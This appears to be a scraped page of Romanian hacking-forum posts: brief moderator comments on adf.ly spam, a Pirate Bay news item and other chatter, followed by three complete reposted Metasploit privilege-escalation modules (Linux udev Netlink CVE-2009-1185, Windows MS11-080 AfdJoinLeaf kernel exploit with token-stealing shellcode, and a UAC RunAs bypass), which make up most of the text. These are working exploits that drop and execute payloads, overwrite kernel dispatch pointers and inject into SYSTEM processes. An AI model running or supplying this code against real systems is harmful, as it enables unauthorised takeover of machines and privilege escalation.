Nytro

Nu sunt. De obicei, cei care au Linux sunt oameni seriosi care nu se ocupa cu astfel de rahaturi.

La 1,2 si 3 incearca sa descoperi singur, acela e tot farmecul. Punctul 4 e putin ambiguu, depinde de pe ce server descarci, ar trebui sa fie mai ok stack-ul de netwroking de pe Linux deoarece nu are limitarile (de "securitate") pe care le are Windows-ul.

Am prieteni care si-au luat masini din banii facuti cu adf.ly si o fata chiar a zis ca din banii castigati si-a pus silicoane! Eu zic sa ne facem toti conturi si sa ne ajutam intre noi. Astia de la adf.ly NU o sa ne imbogateasca cu 15 centi pe luna, DAR daca muncim mult, putem ajunge pana la 2 dolari pe luna, iar daca suntem rabdatori in 50 de ani ne putem lua masini (Dacii)! Cine mai posteaza de adf.ly, sharecash sau alte pulisme destinate copiilor prosti are ban.

Se muta la gunoi. Invatati sa munciti, nu sa furati munca altora. Si nu mai puneti numele "RST" pe toate cacaturile!

Ofera mai multe detalii, nu lasi impresia unui om serios. Despre ce limbaj de programare e vorba, despre ce presupune proiectul si poate chiar despre ce suma de bani este vorba...

Terminati cu rahaturile astea, parca ati avea 12 ani, va bucurati pentru 5 centi pe care in 95% din cazuri nu ii primiti, castigati mai bine daca va rupeti o mana si mergeti la cersit...

Singurul tutorial util si interesant de prin aceasta categorie. Am postat doar pentru "bump", ca sa nu se mai vada celelalte cacaturi de pseudo-tutoriale.

Cacat, n-o fi vreun 0day de Adobe Reader. Fisierul pare sa fie mai vechi de luna aprilie, deci cred ca e in regula. Probobabil antivirusul a detectat bucatile de cod prezente prin fisier, altceva nu stiu ce sa zic. Oricum, cred ca merita citita aceasta carte.

Gata. Topic inchis.

Bre, cauta in codu sursa daca poti citi cumva, cum se genereaza acel md5.

Salveaza hash + rezultat intr-o baza de date daca nu faci deja asta.

Si v-au luat proiectele nu? Eh, nu cred ca o sa fie vreo problema ca o sa fie folosite in scopuri comerciale sau ca nu va vor recunoaste drepturile de autor, sau ca vor "fura" ideea, ca pana la urma, cam asta e tot ce conteaza, de implementat poate implementa oricine. PS: Eu mor ca leaga termenul "hack" de orice cacat. Dar am avut grija sa specific aici: http://en.wikipedia.org/wiki/Hackathon un mic detaliu: "Today, this term is not related to "hacking", it is just a programming marathon.". Plm.

Pff, sa fie oare protectia impotriva XSS? Si sa te anunte ca nu e executat?

Da, 50 de dolari pe luna, cam asa, o caruta de bani, ne-am luat masini din banii aia...

Fals. Au fost, dar nu ieseau tocmai milioane de euro, ci foarte, foarte putin.

Pumba: $acces_list = array(3871, 1, 528, 1348, 22968); Cine chiar are nevoie de acces imi spune motivul si vedem.

Pfoai, cat de tare. DA, daca o sa decryptati acel sir de caractere o sa vedeti cine e "vinovatul". E ceva cu "jSoN".

Nu aici. Daca mai vine cineva cu cate-o stire foarte interesanta din lte domenii, poate posta la Offtopic de exemplu, dar nu facem categorie pentru discutii din alte domenii.

Da-i un PM utilizatorului "tex" de aici, in care sa ii descrii pasiunea ta pentru manele si te va ajuta.

The Pirate Bay s-a mutat in cloud de Liviu Petrescu | 18 octombrie 2012 Pentru a evita raziile politiei, site-ul de torente The Pirate Bay se muta in cloud. Piratii suedezi renunta complet la servere. In acest mod, este asigurata accesibilitatea continua, iar costurile de intretinere scad in mod semnificativ. Dupa o perioada dificila pentru The Pirate Bay, cu probleme tehnice, dar si problemele legale pentru fondatorii site-ului, torentele intra in cloud, scrie CNET. Renuntarea la servere in favoarea stocarii cloud asigura activitatea neintrerupta a The Pirate Bay, deoarece informatiile sale vor fi stocate pe servere situate pe mai multe continente, usor de schimbat. "Ascensiunea" in cloud a The Pirate Bay ingreuneaza si orice efort de a inchide site-ul, atata vreme cat baza sa de date este criptata si ascunsa in numeroase servere cloud. Daca miscarea The Pirate Bay va fi urmata si de alte site-uri ce distribuie continut piratat, lupta impotriva pirateriei online va fi ingreunata. Sursa: The Pirate Bay s-a mutat in cloud | Hit.ro Tot respectul pentru baieti

http://gifura.orzhk.org/src/1332235315120.swf

Request-urile HTTP catre /pagina.php ?

[h=1]Linux udev Netlink Local Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' #load 'lib/msf/core/post/file.rb' #load 'lib/msf/core/exploit/local/unix.rb' #load 'lib/msf/core/exploit/local/linux.rb' #load 'lib/msf/core/exploit/local/linux_kernel.rb' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Common include Msf::Exploit::Local::LinuxKernel include Msf::Exploit::Local::Linux include Msf::Exploit::Local::Unix def initialize(info={}) super( update_info( info, { 'Name' => 'Linux udev Netlink Local Privilege Escalation', 'Description' => %q{ Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland. }, 'License' => MSF_LICENSE, 'Author' => [ 'kcope', # discovery 'Jon Oberheide', # 95-udev-late.rules technique 'egypt' # metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ [ 'CVE', '2009-1185' ], [ 'OSVDB', '53810' ], [ 'BID', '34536' ] ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], #[ 'Command payload', { 'Arch' => ARCH_CMD } ], ], 'DefaultOptons' => { 'WfsDelay' => 2 }, 'DefaultTarget' => 0, 'DisclosureDate' => "", } )) register_options([ OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]), OptInt.new("NetlinkPID", [ false, "Usually udevd pid-1. Meterpreter sessions will autodetect" ]), ], self.class) end def exploit if datastore["NetlinkPID"] and datastore["NetlinkPID"] != 0 netlink_pid = datastore["NetlinkPID"] else print_status("Attempting to autodetect netlink pid...") netlink_pid = autodetect_netlink_pid end if not netlink_pid print_error "Couldn't autodetect netlink PID, try specifying it manually." print_error "Look in /proc/net/netlink for a PID near that of the udevd process" return else print_good "Found netlink pid: #{netlink_pid}" end sc = Metasm::ELF.new(@cpu) sc.parse %Q| #define DEBUGGING #define NULL ((void*)0) #ifdef __ELF__ .section ".bss" rwx .section ".text" rwx .entrypoint #endif call main push eax call exit | # Set up the same include order as the bionic build system. # See external/source/meterpreter/source/bionic/libc/Jamfile cparser.lexer.include_search_path = [ "external/source/meterpreter/source/bionic/libc/include/", "external/source/meterpreter/source/bionic/libc/private/", "external/source/meterpreter/source/bionic/libc/bionic/", "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/", "external/source/meterpreter/source/bionic/libc/kernel/common/", "external/source/meterpreter/source/bionic/libc/arch-x86/include/", ] cparser.parse(%Q| #define DEBUGGING // Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h #ifndef __extension__ #define __extension__ #endif // Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h // Doing #if on an undefined macro is fine in GCC, but a parse error in // metasm. #ifndef __STDC__ #define __STDC__ 0 #endif #include <sys/types.h> #include <stdarg.h> #include <stdio.h> #include <unistd.h> #include <errno.h> |) [ "external/source/meterpreter/source/bionic/libc/bionic/__errno.c", "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c", "external/source/meterpreter/source/bionic/libc/stdio/stdio.c", ].each do |fname| cparser.parse(File.read(fname), fname) end payload_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" evil_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" unix_socket_h(sc) linux_x86_syscall_wrappers(sc) main = %Q^ #include <string.h> #include <linux/netlink.h> #define NULL 0 int main() { int sock; struct iovec iov; struct sockaddr_nl sa; struct msghdr msg; char *mp; char message[4096]; memset(sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; sa.nl_pid = #{netlink_pid}; sa.nl_groups = 0; memset(&msg, 0x00, sizeof(struct msghdr)); msg.msg_name = (void *)&sa; msg.msg_namelen = sizeof(sa); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = NULL; msg.msg_controllen = 0; msg.msg_flags = 0; sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(sock, (struct sockaddr *) &sa, sizeof(sa)); mp = message; mp += sprintf(mp, "remove@/d") + 1; mp += sprintf(mp, "SUBSYSTEM=block") + 1; mp += sprintf(mp, "DEVPATH=/dev/#{Rex::Text.rand_text_alpha(10)}") + 1; mp += sprintf(mp, "TIMEOUT=10") + 1; mp += sprintf(mp, "ACTION=remove") +1; mp += sprintf(mp, "REMOVE_CMD=#{payload_path}") +1; iov.iov_base = (void*)message; iov.iov_len = (int)(mp-message); sendmsg(sock, &msg, 0); close(sock); return 0; } ^ cparser.parse(main, "main.c") asm = cpu.new_ccompiler(cparser, sc).compile sc.parse asm sc.assemble begin elf = sc.encode_string rescue print_error "Metasm Encoding failed: #{$!}" elog "Metasm Encoding failed: #{$!.class} : #{$!}" elog "Call stack:\n#{$!.backtrace.join("\n")}" return end pl = payload.encoded_exe print_status "Writing payload executable (#{pl.length} bytes) to #{payload_path}" write_file(payload_path, pl) print_status "Writing exploit executable (#{elf.length} bytes) to #{evil_path}" write_file(evil_path, elf) print_status "chmod'ing and running it..." cmd_exec("chmod 755 #{evil_path} #{payload_path}") cmd_exec("#{evil_path}") rm_f(evil_path, payload_path) end def autodetect_netlink_pid netlink_pid = nil case session.type when "meterpreter" print_status("Meterpreter session, using get_processes to find netlink pid") process_list = session.sys.process.get_processes udev_proc = process_list.find {|p| p["name"] =~ /udevd/ } udev_pid = udev_proc["pid"] print_status "udev pid: #{udev_pid}" netlink = read_file("/proc/net/netlink") netlink.each_line do |line| pid = line.split(/\s+/)[2].to_i if pid == udev_pid - 1 netlink_pid = pid break end end else print_status("Shell session, trying sh script to find netlink pid") netlink_pid = cmd_exec( %q^ for netlink_pid in $(awk '{print $3}' /proc/net/netlink |sort -u|grep -v -- -); do for udev_pid in $(ps aux | grep [u]devd | awk '{print $2}'); do [ $(( $udev_pid-1 )) = $netlink_pid ] && echo $netlink_pid ; done; done ^) netlink_pid = nil if netlink_pid.empty? end netlink_pid end end Sursa: Linux udev Netlink Local Privilege Escalation

[h=1]MS11-080 AfdJoinLeaf Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues # the system process that it was injected into to die then it's also # possible that the system may become unstable. include Msf::Post::Common include Msf::Post::Windows::Priv def initialize(info={}) super(update_info(info, { 'Name' => 'MS11-080 AfdJoinLeaf Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matteo Memelli', # original exploit and all the hard work 'Spencer McIntyre' # MSF module ], 'Arch' => [ ARCH_X86 ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Automatic', { } ], [ 'Windows XP SP2 / SP3', { 'HaliQuerySystemInfo' => 0x16bba, 'HalpSetSystemInformation' => 0x19436, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ], [ 'Windows Server 2003 SP2', { 'HaliQuerySystemInfo' => 0x1fa1e, 'HalpSetSystemInformation' => 0x21c60, '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ], ], 'References' => [ [ 'CVE', '2011-2005' ], [ 'MSB', 'MS11-080' ], [ 'EDB', 18176 ], [ 'URL', 'http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/' ] ], 'DisclosureDate'=> 'Nov 30 2011', 'DefaultTarget' => 0 })) register_options([ ]) end def find_sys_base(drvname) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]]) session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]]) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) current_drvname = results['lpBaseName'][0..results['return'] - 1] if drvname == nil if current_drvname.downcase.include?('krnl') return [address, current_drvname] end elsif drvname == results['lpBaseName'][0..results['return'] - 1] return [address, current_drvname] end end end # Function borrowed from smart_hashdump def get_system_proc # Make sure you got the correct SYSTEM Account Name no matter the OS Language local_sys = resolve_sid("S-1-5-18") system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}" # Processes that can Blue Screen a host if migrated in to dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"] session.sys.process.processes.each do |p| # Check we are not migrating to a process that can BSOD the host next if dangerous_processes.include?(p["name"]) next if p["pid"] == session.sys.process.getpid next if p["pid"] == 4 next if p["user"] != system_account_name return p end end def exploit if sysinfo["Architecture"] =~ /wow64/i print_error("Running against WOW64 is not supported") return elsif sysinfo["Architectore"] =~ /x64/ print_error("Running against 64-bit systems is not supported") return end mytarget = target if mytarget.name =~ /Automatic/ os = sysinfo["OS"] if os =~ /windows xp/i mytarget = targets[1] end if ((os =~ /2003/) and (os =~ /service pack 2/i)) mytarget = targets[2] end if ((os =~ /\.net server/i) and (os =~ /service pack 2/i)) mytarget = targets[2] end if mytarget.name =~ /Automatic/ print_error("Could not identify the target system, it may not be supported") return end print_status("Running against #{mytarget.name}") end if is_system? print_error("This meterpreter session is already running as SYSTEM") return end this_proc = session.sys.process.open kernel_info = find_sys_base(nil) base_addr = 0x1001 print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") result = session.railgun.ws2_32.WSASocketA("AF_INET", "SOCK_STREAM", "IPPROTO_TCP", nil, nil, 0) socket = result['return'] irpstuff = rand_text_alpha(8) irpstuff << "\x00\x00\x00\x00" irpstuff << rand_text_alpha(4) irpstuff << "\x01\x00\x00\x00" irpstuff << "\xe8\x00" + "4" + "\xf0\x00" irpstuff << rand_text_alpha(231) if not this_proc.memory.writable?(0x1000) session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ]) result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end if not this_proc.memory.writable?(0x1000) print_error('Failed to properly allocate memory') return end this_proc.memory.write(0x1000, irpstuff) hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) hKernel = hKernel['return'] halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable") halDispatchTable = halDispatchTable['return'] halDispatchTable -= hKernel halDispatchTable += kernel_info[0] print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") halbase = find_sys_base("hal.dll")[0] haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo'] halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation'] print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}") print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}") #### Exploitation #### shellcode_address_dep = 0x0002071e shellcode_address_nodep = 0x000207b8 padding = make_nops(2) halDispatchTable0x4 = halDispatchTable + 0x4 halDispatchTable0x8 = halDispatchTable + 0x8 restore_ptrs = "\x31\xc0" restore_ptrs << "\xb8" + [ halpSetSystemInformation ].pack("L") restore_ptrs << "\xa3" + [ halDispatchTable0x8 ].pack("L") restore_ptrs << "\xb8" + [ haliQuerySystemInformation ].pack("L") restore_ptrs << "\xa3" + [ halDispatchTable0x4 ].pack("L") tokenstealing = "\x52" tokenstealing << "\x53" tokenstealing << "\x33\xc0" tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" tokenstealing << "\x8b\x40" + mytarget['_KPROCESS'] tokenstealing << "\x8b\xc8" tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x89\x1d\x00\x09\x02\x00" tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00" tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" tokenstealing << "\x75\xe8" tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x8b\xc1" tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" tokenstealing << "\x5b" tokenstealing << "\x5a" tokenstealing << "\xc2\x10" restore_token = "\x52" restore_token << "\x33\xc0" restore_token << "\x64\x8b\x80\x24\x01\x00\x00" restore_token << "\x8b\x40" + mytarget['_KPROCESS'] restore_token << "\x8b\x15\x00\x09\x02\x00" restore_token << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00" restore_token << "\x5a" restore_token << "\xc2\x10" shellcode = padding + restore_ptrs + tokenstealing this_proc.memory.write(shellcode_address_dep, shellcode) this_proc.memory.write(shellcode_address_nodep, shellcode) this_proc.memory.protect(0x00020000) addr = [ 2, 4455, 0x7f000001, 0, 0 ].pack("s!S!L!L!L!") result = session.railgun.ws2_32.connect(socket, addr, addr.length) if result['return'] != 0xffffffff print_error("The socket is not in the correct state") return end session.railgun.add_function( 'ntdll', 'NtDeviceIoControlFile', 'DWORD', [ [ "DWORD", "FileHandle", "in" ], [ "DWORD", "Event", "in" ], [ "DWORD", "ApcRoutine", "in" ], [ "DWORD", "ApcContext", "in" ], [ "PDWORD", "IoStatusBlock", "out" ], [ "DWORD", "IoControlCode", "in" ], [ "LPVOID", "InputBuffer", "in" ], [ "DWORD", "InputBufferLength", "in" ], [ "LPVOID", "OutputBuffer", "in" ], [ "DWORD", "OutPutBufferLength", "in" ] ]) session.railgun.add_function( 'ntdll', 'NtQueryIntervalProfile', 'DWORD', [ [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] ]) print_status("Triggering AFDJoinLeaf pointer overwrite...") result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) if not is_system? print_error("Exploit failed") return end begin proc = get_system_proc print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}") host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS) mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024)) print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}") host_process.memory.write(mem, payload.encoded) host_process.thread.create(mem, 0) rescue ::Exception => e print_error("Failed to Inject Payload") print_error(e.to_s) end # Restore the token because apparently BSODs are frowned upon print_status("Restoring the original token...") shellcode = padding + restore_ptrs + restore_token this_proc.memory.write(shellcode_address_dep, shellcode) this_proc.memory.write(shellcode_address_nodep, shellcode) result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) end end Sursa: MS11-080 AfdJoinLeaf Privilege Escalation

Windows Escalate UAC Execute RunAs ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Common include Exploit::EXE include Post::File def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate UAC Execute RunAs', 'Description' => %q{ This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix <mubix[at]hak5.org>' # Port to local exploit ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], 'DisclosureDate'=> "Jan 3, 2012" )) register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]) ]) end def exploit root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value('EnableLUA') if lua_setting.data == 1 print_status "UAC is Enabled, checking level..." else print_good "UAC is not enabled, no prompt for the user" end uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') case uac_level.data when 2 print_status "UAC is set to 'Always Notify'" print_status "The user will be prompted, wait for them to click 'Ok'" when 5 print_debug "UAC is set to Default" print_debug "The user will be prompted, wait for them to click 'Ok'" when 0 print_good "UAC is not enabled, no prompt for the user" end # # Generate payload and random names for upload # payload = generate_payload_exe if datastore["FILENAME"] payload_filename = datastore["FILENAME"] else payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" end if datastore["PATH"] payload_path = datastore["PATH"] else payload_path = session.fs.file.expand_path("%TEMP%") end cmd_location = "#{payload_path}\\#{payload_filename}" if datastore["UPLOAD"] print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...") fd = session.fs.file.new(cmd_location, "wb") fd.write(payload) fd.close end session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) end end Sursa: Windows Escalate UAC Execute RunAs + http://www.exploit-db.com/exploits/21845/